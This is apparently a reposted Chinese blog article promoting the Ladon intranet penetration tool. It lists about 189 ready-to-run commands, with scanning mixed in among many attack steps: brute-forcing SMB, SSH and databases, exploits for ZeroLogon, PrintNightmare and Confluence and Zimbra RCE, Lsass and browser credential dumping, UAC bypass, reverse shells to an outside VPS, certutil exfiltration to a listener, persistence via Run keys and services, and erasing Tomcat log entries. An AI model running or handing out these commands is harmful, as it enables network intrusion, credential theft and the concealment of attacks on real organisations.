Ladon，一款优秀的大型内网渗透工具！

Ladon，一款优秀的大型内网渗透工具！
2023-4-15 11:3:0 Author: 黑白之道(查看原文) 阅读量:47 收藏

程序简介

Ladon大型内网渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.10版本内置202个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用简单

虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具

运行环境

Windows

Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等，以及Cobalt Strike内存加载使用
Ladon.ps1完美兼容win7-win10 PowerShell，不看版本可远程加载实现无文件渗透

全平台LadonGo支持Linux、Mac、Arm、MIPS

全平台：Linux、MacOS、Windows等OS
https://github.com/k8gege/LadonGo

奇葩条件

实战并不那么顺利，有些内网转发后很卡或无法转发，只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了，PY的几十M就更别想了
Ladon采用C#研发，程序体积很小500K左右，即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的

宗旨

一条龙服务，为用户提供一个简单易用、功能丰富、高度灵活的扫描工具

特色

扫描流量小
程序体积小
功能丰富强大
程序简单易用
插件支持多种语言
跨平台(Win/Kali/Ubuntu)等
支持Cobalt Strike插件化
支持PowerShell无文件渗透
Exp生成器可一键生成Poc
多版本适用各种环境

程序参数功能

1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量国家段扫描(cidr.txt)
15 支持批量字符串列表(str.txt)
16 支持主机帐密列表(check.txt)
17 支持用户密码列表(userpass.txt)
18 支持指定范围C段扫描
19 支持参数加载自定义DLL（仅限C#）
20 支持参数加载自定义EXE（仅限C#）
21 支持参数加载自定义INI配置文件
22 支持参数加载自定义PowerShell
23 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
24 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)
25 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)
26 支持CIDR格式IP扫描,如100.64.0.0/10，192.168.1.1/20等
27 INI配置支持自定义程序密码爆破

简明使用教程

Ladon 简明使用教程完整文档: http://k8gege.org/Ladon
支持Cmd、Cobalt Strike、PowerShell等内存加载
Windows版本: .Net、Cobalt Strike、PowerShell
全系统版本：GO(全平台)、Python(理论上全平台)
PS: Study方便本地测试使用，完整功能请使用CMD

版本

Ladon 10.10 20230318
简明用法例子 202例

001 自定义线程扫描

例子：扫描目标10.1.2段是否存在MS17010漏洞
单线程：Ladon 10.1.2.8/24 MS17010 t=1
80线程：Ladon noping 10.1.2.8/24 MS17010 t=80

高强度防护下扫描线程设置低一些，单线程或F单线程最佳
单线程：Ladon 10.1.2.8/24 MS17010 f=1

002 Socks5代理扫描

例子：扫描目标10.1.2段是否存在MS17010漏洞（必须加noping）
Ladon noping 10.1.2.8/24 MS17010
详见：http://k8gege.org/Ladon/proxy.html

003 网段扫描/批量扫描

CIDR格式：不只是/24/16/8(所有)

Ladon 192.168.1.8/24 扫描模块
Ladon 192.168.1.8/16 扫描模块
Ladon 192.168.1.8/8  扫描模块

字母格式：仅C段B段A段顺序排序

Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004指定IP范围、网段扫描

ICMP探测1段50-200的存活主机

Ladon 192.168.1.50-192.168.1.200 ICMP

ICMP探测1.30至50.80存活主机

Ladon 192.168.1.30-192.168.50.80 ICMP

TXT格式

004 ICMP批量扫描C段列表存活主机

Ladon ip24.txt ICMP

005 ICMP批量扫描B段列表存活主机

Ladon ip16.txt ICMP

006 ICMP批量扫描cidr列表(如某国IP段)

Ladon cidr.txt ICMP

007 ICMP批量扫描域名是否存活

Ladon domain.txt ICMP

008 ICMP批量扫描机器是否存活使用主机名或机器名探测

Ladon host.txt ICMP

009 WhatCMS批量识别CMS、Banner、SSL证书、标题，可识别未知CMS、路由器、打印机、网络设备、摄像头等

Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段

010 批量检测DrayTek路由器版本、漏洞、弱口令

Ladon url.txt DraytekPoc

011 批量解密Base64密码

Ladon str.txt DeBase64

资产扫描、指纹识别、服务识别、存活主机、端口扫描

012 ICMP扫描存活主机(最快)

Ladon 192.168.1.8/24 ICMP

013 Ping探测存活主机(调用系统Ping命令回显ms、ttl等信息)

Ladon 192.168.1.8/24 Ping

014 多协议探测存活主机（IP、机器名、MAC/域名、制造商/系统版本）

Ladon 192.168.1.8/24 OnlinePC

015 多协议识别操作系统（IP、机器名、操作系统版本、开放服务）

Ladon 192.168.1.8/24 OsScan

016 OXID探测多网卡主机

Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan

017 DNS探测多网卡主机

Ladon 192.168.1.8/24 DnsScan

018 多协议扫描存活主机IP

Ladon 192.168.1.8/24 OnlineIP

019 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 MS17010

020 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 SMBGhost

021 扫描Web标题 Banner 更全信息请使用WhatCMS模块探测

Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan

022 扫描C段站点URL域名

Ladon 192.168.1.8/24 UrlScan

023 扫描C段站点URL域名

Ladon 192.168.1.8/24 SameWeb

024 扫描子域名、二级域名

Ladon baidu.com SubDomain

025 域名解析IP、主机名解析IP

Ladon baidu.com DomainIP
Ladon baidu.com HostIP

025 批量域名解析IP、批量主机名解析IP

Ladon domain.txt DomainIP
Ladon host.txt HostIP

025 批量域名、主机名解析结果只有IP

Ladon domain.txt Domain2IP
Ladon host.txt Host2IP

026 DNS查询域内机器、IP (条件域内，指定域控IP)

Ladon AdiDnsDump 192.168.1.8
```Bash

##### 027 查询域内机器、IP (条件域内)
Ladon GetDomainIP

##### 028 扫描C段端口、指定端口扫描
```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
```Bash

##### 029 扫描C段WEB及识别CMS（86+Web指纹识别）
```Bash
Ladon 192.168.1.8/24 WhatCMS

030 扫描思科设备

Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
```Bash

##### 031 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）
```Bash
Ladon EnumMssql

032 枚举网络共享资源（域、IP、主机名\共享路径）

Ladon EnumShare

033 扫描LDAP服务器(探测域控)

Ladon 192.168.1.8/24 LdapScan

034 扫描FTP服务器并识别版本

Ladon 192.168.1.8/24 FtpScan

暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH：http://k8gege.org/Ladon/sshscan.html

035 445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

036 135端口 Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

037 389端口 LDAP服务器、AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

038 5985端口 Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan

039 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

040 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

041 22端口 SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

042 1433端口 Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan

043 1521端口 Oracle数据库密码爆破

Ladon 192.168.1.8/24 OracleScan

044 3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

045 7001端口 Weblogic后台密码爆破

Ladon http://192.168.1.8:7001/console WeblogicScan<br>
Ladon 192.168.1.8/24 WeblogicScan

046 5900端口 VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan

047 21端口 Ftp服务器密码爆破

Ladon 192.168.1.8/24 FtpScan

048 8080端口 Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan

049 Web端口 401基础认证密码爆破

Ladon http://192.168.1.8/login HttpBasicScan
Ladon ip.txt 401Scan

050 445端口 Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

051 445端口 IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

052 139端口Netbios协议Windows密码爆破

Ladon 192.168.1.8/24 NbtScan

053 5985端口Winrm协议Windows密码爆破

Ladon 192.168.1.8/24 WinrmScan

054 网络摄像头密码爆破(内置默认密码)

Ladon 192.168.1.8/24 DvrScan

漏洞检测/Poc

055 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010

056 SMBGhost漏洞检测 CVE-2020-0796 911保留

Ladon 192.168.1.8/24 SMBGhost

057 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

058 PhpStudy后门检测(phpstudy 2016/phpstudy 2018) 10.9移除 911保留

Ladon 192.168.1.8/24 PhpStudyPoc

059 ActiveMQ漏洞检测(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

060 Tomcat漏洞检测(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc

061 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc

062 DraytekPoc CVE-2020-8515漏洞检测、Draytek版本探测、弱口令检测

Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc

漏洞利用/Exploit

063 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

064 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

065 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)

Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=<br>
Ladon CmdDll b64x64 YwBhAGwAYwA=

066 CVE-2021-40444 微软IE/Office 0day漏洞

Ladon CVE-2021-40444 MakeCab poc.dll<br>
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

067 DraytekExp CVE-2020-8515远程执行命令EXP

Ladon DraytekExp http://192.168.1.8  whoami

068 域渗透 ZeroLogon CVE-2020-1472域控提权(密码置空)

Ladon ZeroLogon dc.k8gege.org

069 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)

Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520

070 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

文件下载、文件传输

071 内网文件传输 HTTP下载 HTTPS下载 MSF下载

Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

072 内网文件传输 Ftp下载

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

加密解密(HEX/Base64)

073 Hex加密解密

Ladon 123456 EnHex
Ladon 313233343536 DeHex

074 Base64加密解密

Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon str.txt DeBase64

网络嗅探

075 Ftp密码嗅探(绑定本机IP，自动嗅探C段)

Ladon FtpSniffer 192.168.1.5

076 HTTP密码嗅探(绑定本机IP，自动嗅探C段)

Ladon HTTPSniffer 192.168.1.5

077 网络嗅探

Ladon Sniffer

密码读取

078 读取IIS站点密码、网站路径

Ladon IISpwd

079 读取连接过的WIFI密码

Ladon WifiPwd

080 读取FileZilla FTP密码

Ladon FileZillaPwd

081 读取系统Hash、VPN密码、DPAPI-Key 10.9移除

Ladon CVE-2021-36934

082 DumpLsass内存密码(mimikatz明文) 限9.1.1版本之前

Ladon DumpLsass

信息收集

083 获取本机内网IP与外网IP

Ladon GetIP

084 获取PCname GUID CPUID DiskID Mac地址

Ladon GetID

085 查看用户最近访问文件

Ladon Recent

086 U盘、USB使用记录查看(USB名称、USB标记、路径信息)

Ladon UsbLog

087 检测后门(注册表启动项、DLL劫持)

Ladon CheckDoor
Ladon AutoRun

088 进程详细信息(程序路径、位数、启动参数、用户)

Ladon EnumProcess
Ladon Tasklist

089 获取命令行参数

Ladon cmdline
Ladon cmdline cmd.exe

090 获取渗透基础信息

Ladon GetInfo
Ladon GetInfo2

091 .NET & PowerShell版本

Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion

092 运行时版本&编译环境

Ladon Ver<br>
Ladon Version

093 运行时版本&编译环境&安装软件列表

Ladon AllVer
Ladon AllVersion

094 查看IE代理信息

Ladon QueryProxy

095 DirList列目录+基础渗透信息

默认列全盘

Ladon DirList

指定盘符或目录

Ladon DirList c:\

096 QueryAdmin查看管理员用户

Ladon QueryAdmin

097 查看本机命名管道

Ladon GetPipe

098 RdpLog查看3389连接记录

Ladon RdpLog

远程执行(psexec/wmiexec/atexec/sshexec/smbexec)

099 445端口加密PSEXEC远程执行命令（交互式）

net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system

100 135端口 WmiExec远程执行命令（非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

101 445端口 AtExec远程执行命令（非交互式）

Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami

102 22端口 SshExec远程执行命令（非交互式）

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

103 JspShell远程执行命令（非交互式）9.3.0移除

Usage：Ladon JspShell type url pwd cmd

Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

104 WebShell远程执行命令（非交互式）9.3.0移除

Usage：Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami
获取系统版本信息 方便提权
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

105 135端口 WmiExec2远程执行命令支持HASH （非交互式）支持文件上传

Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash，再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash，再pth执行命令

106 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

107 WinrmExec远程执行命令无回显（支持System权限）

Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

提权降权

108 whoami查看当前用户权限以及特权

Ladon whoami

109 6种白名单BypassUAC(8.0后)Win7-Win10 10.8版本移除仅911保留

用法: Ladon BypassUAC Method Base64Cmd

Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

110 BypassUac2 绕过UAC执行,支持Win7-Win10 10.8版本移除仅911保留

Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat

111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP

Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll

112 CVE-2022-21999 SpoolFool打印机漏洞提权EXP

Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll

113 GetSystem 提权System权限执行CMD

Ladon GetSystem cmd.exe

114 复制令牌执行CMD(如system权限降权exploer当前用户)

Ladon GetSystem cmd.exe explorer

115 Runas 模拟用户执行命令

Ladon Runas user pass cmd

116 MS16135提权至SYSTEM

Ladon ms16135 whoami   >=9.2.1版本移除 911保留

117 BadPotato服务用户提权至SYSTEM

Ladon BadPotato cmdline

118 SweetPotato服务用户提权至SYSTEM

Ladon SweetPotato cmdline

119 EfsPotato Win7-2019提权(服务用户权限提到system)

Ladon EfsPotato whoami

120 Open3389一键开启3389

Ladon Open3389

121 激活内置管理员Administrator

Ladon ActiveAdmin

122 激活内置用户Guest

Ladon ActiveGuest

反弹Shell

123 反弹TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc

124 反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

125 反弹TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter

126 反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

127 反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

128 反弹TCP CMD & PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh

129 反弹UDP Cmd & PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp

130 netsh本机888端口转发至112的22端口

Ladon netsh add 888 192.168.1.112 22

131 PortTran端口转发(3389例子)

VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

本机执行

132 RDP桌面会话劫持（无需密码）

Ladon RdpHijack 3
Ladon RdpHijack 3 console

133 添加注册表Run启动项

Ladon RegAuto Test c:\123.exe

134 AT计划执行程序(无需时间)(system权限)

Ladon at c:\123.exe
Ladon at c:\123.exe gui

135 SC服务加启动项&执行程序(system权限）

Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

系统信息探测

136 Snmp协议探测操作系统、设备等信息

Ladon 192.168.1.8/24 SnmpInfo

137 Nbt协议探测Windows主机名、域、用户

Ladon 192.168.1.8/24 NbtInfo

138 Smb协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 SmbInfo

139 Wmi协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 WmiInfo

140 Mssql协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 MssqlInfo

141 Winrm协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 WinrmInfo

142 Exchange探测Windows版本、主机名、域

Ladon 192.168.1.8/24 ExchangeInfo

143 Rdp协议探测Windows版本、主机名、域使用单线程

Ladon 192.168.1.8/24 RdpInfo f=1

其它功能

144 Win2008一键启用.net 3.5

Ladon EnableDotNet

145 获取内网站点HTML源码

Ladon gethtml http://192.168.1.1

146 一键迷你WEB服务器渗透监听专用WEB服务器

Ladon web 80
Ladon web 80 dir

获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg) http://192.168.1.8/ip.txt

147 getstr/getb64/debase64/savetxt(无回显漏洞回显结果)

监听

Ladon web 800

提交返回明文

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

Base64加密结果

certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520

Base64结果解密

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

148 Shiro插件探测

Ladon 192.168.1.8/24 IsShiro

149 LogDelTomcat 删除Tomcat指定IP日志

Ladon LogDelTomcat access.log 192.168.1.8

150 C#自定义程序集插件扫描

Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)

151 ReadFile 读取大文件前面指定长度内容

Ladon ReadFile c:\k8.exe 默认1k
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M

152 修改注册表读取2012及后系统明文密码

Ladon SetMzLogonPwd 1

153 修改注册表劫持签名签证

Ladon SetSignAuth 1

154 IP24 批量IP转成ip24格式(192.168.1.1/24)

Ladon ip.txt IP24

155 IPC 批量IP转成ip C格式(192.168.1.)

Ladon ip.txt IPC

156 IPB 批量IP转成ip B格式(192.168.)

Ladon ip.txt IPB

157 漏洞检测Atlassian Confluence CVE-2022-26134

Ladon url.txt CVE-2022-26134

158 Atlassian Confluence CVE-2022-26134 EXP

Ladon EXP-2022-26134 https://111.123.123.123 id

159 RevShell-2022-26134 CVE-2022-26134反弹Shell

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

160 SslInfo 证书探测设备、IP、域名、机器名、组织机构等信息

Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo

161 SslInfo 证书批量探测设备、IP、域名、机器名、组织机构等信息

Ladon ip.txt SslInfo
Ladon url.txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo

162 WPinfo 多种方法获取WordPress主程序、主题、插件版本

Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo

163 WPinfo 批量获取WordPress主程序、主题、插件版本

Ladon ip.txt WPinfo
Ladon url.txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo

164 Exchange暴力破解识别Exchange密码爆破

Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan

165 CVE-2022-27925 批量探测Zimbra邮服ZIP目录穿越RCE漏洞

Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip.txt CVE-2022-27925
Ladon url.txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925

166 EXP-2022-27925 Zimbra邮服未授权RCE漏洞EXP GetShell

Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip

167 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

JSP UAshell 查看系统版本、python、gcc等信息方便提权

Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo

168 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

169 非交互式连接IIS-Raid后门执行命令

Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami

170 FindIP匹配IP段是否出现在漏洞结果中

Ladon FindIP ipc.txt ISVUL.txt		 (精确搜索)
Ladon FindIP ipc.txt ISVUL.txt like  (模糊搜索)

171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 路由器密码读取

Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码

172 PrinterPoc 打印机PJL任意代码执行漏洞批量检测

Ladon 192.168.1.8 PrinterPoc
Ladon ip.txt PrinterPoc
禁ping机器扫描使用noping
Ladon noping 192.168.1.8 PrinterPoc
Ladon noping ip.txt PrinterPoc

173 通过Mac查询制造商(Ladon Mac MAC地址)

Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66

174 Cisco VPN路由器密码爆破(内置默认密码，支持明文、Hash)

Ladon 192.168.1.8/24 CiscoScan
Ladon https://192.168.1.8 CiscoScan
Ladon ip.txt CiscoScan
Ladon url.txt CiscoScan

175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 笑脸后门漏洞检测 10.9移除

Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc

176 WpScan WordPress密码审计、弱口令

Ladon http://192.168.1.8 WpScan
Ladon url.txt WpScan
Ladon 192.168.1.8/24 WpScan http  扫描IP时添加http://

177 探测Exchange版本

Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer

178 Exchange高危RCE漏洞检测

Ladon https://192.168.1.8 ExchangePoc

179 Http/S获取网页返回头信息

Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://

180 Http/S获取网页返回头信息+源码

Ladon https://192.168.1.8 GetHtml
Ladon ip.txt GetHtml
Ladon 192.168.1.8/24 GetHtml http
Ladon ip.txt GetHtml https		   扫描IP时添加https://

181 Http/S获取网页中的域名

Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://

182 TrueIP绕过CDN获取域名真实IP(可用域名、标题、Banner等唯一关键字特征)

Ladon ip.txt TrueIP k8gege.org
Ladon 192.168.1.8/24 TrueIP k8gege.org
Ladon ip.txt TrueIP "K8哥哥"
Ladon 192.168.1.8/24 TrueIP "K8哥哥"

183 Firefox密码\Cookie\历史记录读取

Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie

184 BypassUAC11无回显支持Win7、Win8、Win11 Win2012\2016\2019等 10.8版本移除

Ladon40 BypassUAC11 cmd
Ladon40 BypassUAC11 c:\1.bat
Ladon40 BypassUAC11 c:\1.exe

185 GetPwd支持Navicat、TeamView、Xshell、SecureCRT密码读取

Ladon GetPwd
```Bash

##### 186 DraytekScan 密码审计Draytek弱口令检测
```Bash
Ladon 192.168.1.8 DraytekScan
Ladon https://192.168.1.8 DraytekScan
Ladon 192.168.1.8/24 DraytekScan
Ladon url.txt DraytekScan

187 XshellPwd Xshell密码读取

Ladon XshellPwd

188 FortiGate CVE-2022-40684 未授权写SSH-KEY admin admin123

Ladon 192.168.1.8 CVE-2022-40684
Ladon https://192.168.1.8 CVE-2022-40684
Ladon 192.168.1.8/24 CVE-2022-40684
Ladon url.txt CVE-2022-40684

189 MssqlCmd SQL Server远程执行命令 SQL版本、OS信息 xp_cmdshell

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
